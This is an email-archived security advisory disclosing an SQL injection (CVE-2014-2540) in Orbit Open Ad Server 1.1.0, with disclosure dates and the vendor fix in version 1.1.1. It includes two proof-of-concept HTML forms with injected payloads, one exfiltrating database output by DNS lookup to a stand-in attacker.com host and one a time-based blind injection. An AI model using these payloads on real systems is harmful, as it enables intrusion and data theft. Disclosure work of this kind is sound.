Advisory ID: HTB23208 Product: Orbit Open Ad Server Vendor: OrbitScripts, LLC Vulnerable Version(s): 1.1.0 and probably prior Tested Version: 1.1.0 Advisory Publication: March 19, 2014 [without technical details] Vendor Notification: March 19, 2014=20 Vendor Patch: March 21, 2014=20 Public Disclosure: April 9, 2014=20 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-2540 Risk Level: High=20 CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in Orbit Op= en Ad Server, which can be exploited to perform SQL Injection attacks, alte= r SQL requests to database of vulnerable application and potentially gain c= ontrol over the vulnerable website. 1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540 Input passed via the "site_directory_sort_field" HTTP POST parameter to "/g= uest/site_directory" URL is not properly sanitised before being used in SQL= query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL = commands. The PoC code below is based on DNS Exfiltration technique and may be used i= f the database of the vulnerable application is hosted on a Windows system= =2E The PoC will send a DNS request demanding IP addess for `version()` (or= any other sensetive output from the database) subdomain of ".attacker.com"= (a domain name, DNS server of which is controlled by the attacker): <form action=3D"http://[host]/guest/site_directory" method=3D"post" name=3D= "main"> <input type=3D"hidden" name=3D"active_form" value=3D"site_directory_form"> <input type=3D"hidden" name=3D"ad_type_filter" value=3D"text"> <input type=3D"hidden" name=3D"category_filter" value=3D"1"> <input type=3D"hidden" name=3D"cost_model_filter" value=3D"cpm"> <input type=3D"hidden" name=3D"form_mode" value=3D"save"> <input type=3D"hidden" name=3D"image_size_filter" value=3D"12"> <input type=3D"hidden" name=3D"keyword_filter" value=3D"1"> <input type=3D"hidden" name=3D"site_directory_page" value=3D"1"> <input type=3D"hidden" name=3D"site_directory_per_page" value=3D"10"> <input type=3D"hidden" name=3D"site_directory_sort_direction" value=3D"asc"= > <input type=3D"hidden" name=3D"site_directory_sort_field" value=3D"(select = load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHA= R(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),C= HAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98)= ,CHAR(97),CHAR(114))))"> <input type=3D"submit" id=3D"btn"> </form> The second PoC code works against any platform (UNIX/Windows) and uses blin= d SQL injection brute-force (dichotomy) technique to extract data from the = database: <form action=3D"http://[host]/guest/site_directory" method=3D"post" name=3D= "main"> <input type=3D"hidden" name=3D"active_form" value=3D"site_directory_form"> <input type=3D"hidden" name=3D"ad_type_filter" value=3D"text"> <input type=3D"hidden" name=3D"category_filter" value=3D"1"> <input type=3D"hidden" name=3D"cost_model_filter" value=3D"cpm"> <input type=3D"hidden" name=3D"form_mode" value=3D"save"> <input type=3D"hidden" name=3D"image_size_filter" value=3D"12"> <input type=3D"hidden" name=3D"keyword_filter" value=3D"1"> <input type=3D"hidden" name=3D"site_directory_page" value=3D"1"> <input type=3D"hidden" name=3D"site_directory_per_page" value=3D"10"> <input type=3D"hidden" name=3D"site_directory_sort_direction" value=3D"asc"= > <input type=3D"hidden" name=3D"site_directory_sort_field" value=3D"(SELECT = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=3D0,1, BENCHMARK(22000000,MD5(NOW= ()))))"> <input type=3D"submit" id=3D"btn"> </form> ---------------------------------------------------------------------------= -------------------- Solution: Update to Orbit Open Ad Server 1.1.1 ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/= HTB23208 - SQL Injection in Orbit Open Ad Server. [2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open s= ource ad tool that lets you manage the profits while we manage the technolo= gy. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE - https://portal.htbridge.com/ - is High-Tech Bridge's = proprietary web application security assessment solution with SaaS delivery= model that combines manual and automated vulnerability testing. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.